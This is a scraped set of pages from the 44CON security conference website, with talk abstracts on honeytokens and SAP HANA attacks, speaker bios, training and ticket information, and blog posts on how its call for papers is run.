          When the numbers put forward by vendors, industry bodies and the media all vary so widely (not just between those sectors but within them as well), is it any wonder that any serious attempt to establish the scale, the cost or the impact of such attacks is doomed to failure? The disconnect between the reporting of cyber-crime and the actual metrics that are most important for both businesses under attack and the industry that exists to mitigate them will remain until the difficulties of comparing oranges with apples become apparent.

          Attempting any such comparative exercise is fraught with peril and serves to highlight where we, as an industry, are getting our metrics wrong; the largely accepted cost per record breach metric is far too broad a brush to paint any kind of recognizable real world picture. When reporting and discussing the scale and impact of cyber-crime it is imperative that we move away from sensationalizing of one part of the story or consequence of the breach, that which will create the biggest search engine feeding frenzy. Who the criminals were is of less import than how they got in; compromise indicators are more valuable to other businesses than the financial cost to that particular victim.

          The measurement metric dial has, ultimately, moved too far towards attribution and needs to be reset to prevention and a business-based analysis of risk once more. That business-based analysis itself needs to be more realistic, so there also has to be a move away from the kind of threat intelligence reporting which is almost exclusively dominated by data derived from the large enterprise sector and consequently of little relevance to the Small and Medium Enterprise (SME) market.

          The data upon which threat intelligence and attack surface trend analysis resources are based must become more granular if it is to become more relevant across all business sectors. If we continue to go down the road of never disclosing or identifying the security components that failed or the components that were not in place when a breach happened, we will never make any progress against an elusive enemy.

          Ian Trump, CD, CPM, BA is an ITIL certified Information Technology (IT) consultant with 20 years of experience in IT security and information technology. As a project and operational resource, Ian has functioned as an IT business analyst, project coordinator and as a senior technical security resource as required. Ian’s broad experience on security integration projects, facilitating technological change and promoting security best practices have been embraced and endorsed by his industry peers.

          From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013. His previous contract was managing all IT projects for the Canadian Museum of Human Rights (CMHR). CMHR is the first museum solely dedicated to the evolution, celebration and future of human rights – it is the first national museum to be built in nearly half a century, and the first outside the National Capital Region.

          Currently, Ian is the Global Security Lead at LogicNow working across all lines of business to define, create and execute security solutions to promote a safe, secure Internet for Small & Medium Business world wide.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Azhar Desai & Nicholas Rohrbeck: Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Azhar Desai & Nicholas Rohrbeck – Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Using honeytokens to detect breaches is an old idea that has been sporadically spoken about (and implemented less often). Despite recommendations from the occasional consultant, honeytokens have not been adopted as widely as they should have. This needed to change. In 2015, we released Canarytokens (http://canarytokens.org) to bring about wider use of tokens.

          Canarytokens natively supports web bugs, DNS tripwires, SQL row tokens, document tokens and a handful of other friends. Via a simple web interface, several thousands of these tokens have been deployed worldwide (and a number of breaches have been reliably discovered). Considering that most tokens can be deployed in under 5 seconds, this was already pretty good ROI.

          This year, tokens go much further. From abusing native OS functionality to bending cloud infrastructure, this talk covers work done in our new quest to “token all the things”. We’ll show infrastructure we built for users to easily set tripwires around their network without installing agents, deploying hardware or spending a cent. AlonAzhar Desai Speaker Photog with file format chicanery and old fashioned web-app-abuse, we will show new techniques (and defensive hacks) that you can use to detect breaches on your networks.

          Azhar writes and runs software with a security bent at Thinkst, an applied research company focusing on information security. He has, in the past, had fun presenting with others from Thinkst at conferences such as Troopers (2015) and HITB KL (2014).

          Nick is a software developer at Thinkst Applied Research. Before arriving at Thinkst, he was primarily a Java developer, but now his days are filled with Python, network security research, DevOps tinkering and (badly) playing Go.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Azhar Desai & Nicholas Rohrbeck: Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Azhar Desai & Nicholas Rohrbeck – Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Using honeytokens to detect breaches is an old idea that has been sporadically spoken about (and implemented less often). Despite recommendations from the occasional consultant, honeytokens have not been adopted as widely as they should have. This needed to change. In 2015, we released Canarytokens (http://canarytokens.org) to bring about wider use of tokens.

          Canarytokens natively supports web bugs, DNS tripwires, SQL row tokens, document tokens and a handful of other friends. Via a simple web interface, several thousands of these tokens have been deployed worldwide (and a number of breaches have been reliably discovered). Considering that most tokens can be deployed in under 5 seconds, this was already pretty good ROI.

          This year, tokens go much further. From abusing native OS functionality to bending cloud infrastructure, this talk covers work done in our new quest to “token all the things”. We’ll show infrastructure we built for users to easily set tripwires around their network without installing agents, deploying hardware or spending a cent. AlonAzhar Desai Speaker Photog with file format chicanery and old fashioned web-app-abuse, we will show new techniques (and defensive hacks) that you can use to detect breaches on your networks.

          Azhar writes and runs software with a security bent at Thinkst, an applied research company focusing on information security. He has, in the past, had fun presenting with others from Thinkst at conferences such as Troopers (2015) and HITB KL (2014).

          Nick is a software developer at Thinkst Applied Research. Before arriving at Thinkst, he was primarily a Java developer, but now his days are filled with Python, network security research, DevOps tinkering and (badly) playing Go.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Juan Perez-Etchegoyen & Nahuel Sanchez : Attacks on SAP HANA platform

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Juan Perez-Etchegoyen & Nahuel Sanchez – Attacks on SAP HANA Platform

          Companies nowadays are choosing between on-premise, cloud and hybrid deployment models. The common factor across all of these scenarios is the underlying platform, used in the background to run all on-premise and cloud-based applications developed by SAP. This platform is called SAP HANA, which is an in-memory database integrated with an application server that provides a new paradigm for vulnerabilities and risks, serving an increasing number of business applications, providing cutting edge features and overwhelming performance.

          With the rise of IoT, many features and interfaces are integrated into SAP HANA and the HANA Cloud Platform, enabling it as a central point for IoT communications and making it an interesting target for anyone trying to access the information of several millions of devices across the world. Vulnerabilities affecting SAP HANA now have an increased attack surface, as these could be abused to compromise many diverse deployments and many customers, if the customers are not properly taking care of these risks.

          Join us for this presentation to learn about diverse attack vectors affecting current SAP solutions, on-premise and cloud-based. You will not only learn technical details about these vulnerabilities, but also understand how to prevent and detect attacks to our crown jewels, running on HANA.

           

          Juan Perez-Etchegoyen leads the Product teams that keep Onapsis on the cutting-edge of the business-critical application security market. He is responsible for the design, research and development of Onapsis’ innovative software solutions, and helps manage the development of new products as well as the SAP cyber-security research that has garnered critical acclaim for the Onapsis Research Labs. He is regularly invited to speak and host training at global industry conferences including Blackhat, HackInTheBox, Troopers, and SAP TechEd/DCODE. Prior to joining Onapsis, Juan led many Information Security consultancy projects for Companies in Latin America, EE.UU. and Europe. His strongest experience is in the field of Penetration Testing, Web Application Testing, Vulnerabilities Research, Information Security Auditing and Standards.

          Nahuel D. Sanchez is a  security researcher at Onapsis. Being a member of Onapsis Research Labs, his work focuses on performing extensive research of SAP products and components, identifying and reporting security vulnerabilities, attack vectors and advanced exploitation techniques that are applicable to different platforms. Nahuel is one of the most frequent Nahuel Sanchez Speaker Photoreporters of vulnerabilities in SAP products and is a frequent author of the publication “SAP Security In-Depth”. He previously worked as a security consultant, evaluating the security of Web applications and participating in Penetration Testing projects. His areas of interest include Web security, reverse engineering, and the security of Business-Critical applications.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Juan Perez-Etchegoyen & Nahuel Sanchez : Attacks on SAP HANA platform

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Juan Perez-Etchegoyen & Nahuel Sanchez – Attacks on SAP HANA Platform

          Companies nowadays are choosing between on-premise, cloud and hybrid deployment models. The common factor across all of these scenarios is the underlying platform, used in the background to run all on-premise and cloud-based applications developed by SAP. This platform is called SAP HANA, which is an in-memory database integrated with an application server that provides a new paradigm for vulnerabilities and risks, serving an increasing number of business applications, providing cutting edge features and overwhelming performance.

          With the rise of IoT, many features and interfaces are integrated into SAP HANA and the HANA Cloud Platform, enabling it as a central point for IoT communications and making it an interesting target for anyone trying to access the information of several millions of devices across the world. Vulnerabilities affecting SAP HANA now have an increased attack surface, as these could be abused to compromise many diverse deployments and many customers, if the customers are not properly taking care of these risks.

          Join us for this presentation to learn about diverse attack vectors affecting current SAP solutions, on-premise and cloud-based. You will not only learn technical details about these vulnerabilities, but also understand how to prevent and detect attacks to our crown jewels, running on HANA.

           

          Juan Perez-Etchegoyen leads the Product teams that keep Onapsis on the cutting-edge of the business-critical application security market. He is responsible for the design, research and development of Onapsis’ innovative software solutions, and helps manage the development of new products as well as the SAP cyber-security research that has garnered critical acclaim for the Onapsis Research Labs. He is regularly invited to speak and host training at global industry conferences including Blackhat, HackInTheBox, Troopers, and SAP TechEd/DCODE. Prior to joining Onapsis, Juan led many Information Security consultancy projects for Companies in Latin America, EE.UU. and Europe. His strongest experience is in the field of Penetration Testing, Web Application Testing, Vulnerabilities Research, Information Security Auditing and Standards.

          Nahuel D. Sanchez is a  security researcher at Onapsis. Being a member of Onapsis Research Labs, his work focuses on performing extensive research of SAP products and components, identifying and reporting security vulnerabilities, attack vectors and advanced exploitation techniques that are applicable to different platforms. Nahuel is one of the most frequent Nahuel Sanchez Speaker Photoreporters of vulnerabilities in SAP products and is a frequent author of the publication “SAP Security In-Depth”. He previously worked as a security consultant, evaluating the security of Web applications and participating in Penetration Testing projects. His areas of interest include Web security, reverse engineering, and the security of Business-Critical applications.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          #####EOF##### DSC_2222 – 44CON

          DSC_2222

          #####EOF##### 44CON Training – 44CON

          44CON Training

          As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

          Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

          2019 Schedule

          June Training: 6th – 7th June 2019

          We have 3 training courses available in June at two days in length. Training will take place at the Novotel London West in Hammersmith:

          Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

          September Training: 9th – 11th September 2019

          Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

          Training will take place at the Novotel London West in Hammersmith:

          More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

          December Training: 2nd – 6th December 2019

          Our call for training is now closed. Courses will be listed in due course.

          Please contact us if you’d like to deliver training in London in March 2020.

          44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

          #####EOF##### Dawid Czagan’s training course is still going ahead – 44CON

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          #####EOF##### Training course at 44CON Cyber Security 2016 – 44CON

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favourite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### The 44CON CFP just closed. You won’t believe what happens next. – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          How our CFP works

          Our CFP uses the HotCRP system. There are 14 people on this year’s programme committee. In 2017 we had 146 complete submissions. Once the CFP closes we are unable to take further submissions. We’d love to, we really would. In our experience, this has led to people being upset in the past. This is one of the many reasons we can’t have nice things.

          At the time of writing voting is still ongoing. After closing there’s a two week voting window. In the third week we start processing accepts and hard rejects.

          We want each talk to get at least 5 votes. CFP programme committee members can still vote on talks with fewer than 5 votes in the third week.

          Scoring talks

          Talks are scored from 1 to 5. We use the mean average score to determine the final figure. Anything with fewer than 5 votes is treated slightly differently. I’ll come to that later.

          The lowest scoring talks are rejected more or less instantly from the third week on, unless they have fewer than 5 votes. Accepts go out for the 20 highest scoring submissions first. We work down the list as slots are filled.

          On average talks have to score over 4/5 to make the main tracks. That’s a very high standard and a lot of really good talks don’t make it. It’s frustrating to reject awesome talks but unfortunately we only have so many available slots.

          We have 18-20 main track talk slots in any given year, 4-8 workshop slots and an unconference track shared with workshop slots.

          Processing

          Accept and reject emails start to go out two weeks after the CFP closes. In 2017 this is from the 15th of June. We start with the lowest and highest scoring talks and work our way towards the middle.

          Accepts go out to the top 20 submissions first. We then work down the list until all slots are filled. Speakers have until the end of June to confirm and get the necessary information back for us to book their travel.

          If you haven’t received an email by mid-June don’t worry. Sometimes it means you’re close to being accepted, but others need to drop out or confirm first. If you’re on hold it doesn’t mean your submission isn’t appreciated. On the contrary, we appreciate it a lot and are trying to get you a slot. We aim to email you by June 19th if this is the case.

          Talks scoring lower than 3 are usually rejected immediately (with the exception of talks with fewer than 5 votes).

          Talks with few votes

          Once we’ve filled all slots we’ll close the CFP for the year. If a talk hasn’t had enough votes we’ll poke CFP committee members to vote. Talks with fewer than 5 votes won’t be rejected until they’ve either passed the 5 vote threshold or all slots have been filled.

          Backup speakers

          We have a small amount of slots for backup speakers. We’ll try to find you a place and time to speak if you want to, but can’t guarantee it. We advise against challenging other speakers to combat for their slots as duelling has been illegal in the United Kingdom for some time.

          Obtaining feedback

          All speakers have the right to feedback. Just mail speaker ops when you get your rejection/accept email and we’ll take care of this. Steve handles feedback personally. As such it sometimes takes a while to obtain and collate feedback for everyone.

          Hopefully this should give you an insight into our process. If you have any questions or you haven’t heard from us (and have checked your spam folder), drop us an email and we’ll do our best.

          #####EOF##### 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

          More 2018 44CON Videos Added

          This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          Continue reading “Building an AWS and Azure security training platform”

          Hacking 44CON’s Pricing Model (5 Different Ways)

          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

          #####EOF##### 44CON CYBER SECURITY 2015 – 44CON

          44CON CYBER SECURITY 2015

          44con-cs

          What is 44CON Cyber Security?

          Brand new for 2015, 44CON Cyber Security is an annual one day Information Security Conference and Exhibition that is taking place in London, on Tuesday 28th April 2015.

          44CON Cyber Security will be a full day event with workshops, talks, a new exhibition and plenty of networking – all delivered by people who do cyber security rather than just sell cyber security.

          44CON Cyber Security focuses on both the management and technical side of information security topics. With a respected panel of Program Committee members, we aim to bring the same fresh knowledge and 44CON awesomeness to the attendees.

           

          How do I register for 44CON Cyber Security?

          You can register now and there will be two types of tickets:

          The 44CON Cyber Security PREMIUM ticket (£100) will include:

          • A dedicated presentation track covering Information Security topics
          • Two dedicated workshop tracks that will have takeaways
          • Keynote addresses by respected industry experts
          • Exhibitor area
          • Networking opportunities
          • Networking Lunch
          • 44CON CS badge and lanyard
          • Refreshments

          The 44CON Cyber Security FREE ticket – WOAH did you say 44CON free – Yes, a FREE visitor ticket will include:

          • Access to the exhibition
          • 44CON CS badge and lanyard
          • Access to the 44CON CyberSec track
          • Networking opportunities
          • A lunch option (extra cost)

          Tickets for this event will be capped so you’ll have to get them quickly! – registration is now open here

           

          Where will the 44CON Cyber Security take place?

          44CON Cyber Security will take place at the ILEC Conference venue, Lillie road, London on Tuesday 28th April 2015

          How can I exhibit at or sponsor 44CON Cyber Security

          Email the team at sponsorops@44con.com and we’ll send you some more information

          How can I become a 44CON Media Partner?

          Email the 44CON marketing team at marketing@44con.com and we can set up a call to discuss

          I am a member of the press, how can I register?

          Email the 44CON marketing team at marketing@44con.com and we can set up a call to discuss

          #####EOF##### ISSA -UK – 44CON

          ISSA -UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association ISSA-UKspecifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Δημιουργία νέου λογαριασμού
          #####EOF##### Sense/Net | 44CON Schwag




          #####EOF##### 44CON 2017 – 44CON

          44CON 2017

          44CON 2017 will take place on 13th to 15th of September 2016 at the ILEC Conference Centre. It will kick off on Wednesday 13th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand.

          Early Bird Tickets for 44CON 2017 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          Like we did last year, we are giving you the option to book a hotel room at the same time as your ticket, for 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, for:

          • £110 per night for a single room (inc VAT)
          • £120 per night for a double or twin room (inc VAT)

          You can also book rooms at the same price directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON17-ATT. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          #####EOF##### bbs – 44CON

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

          Screen Shot 2018-08-29 at 20.37.05

          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Screen Shot 2018-08-30 at 11.24.12

          Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

          Screen Shot 2018-08-29 at 20.37.41

          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           

          Screen Shot 2018-08-29 at 20.38.33

          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          #####EOF##### 44CON – Page 2 – 44CON

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

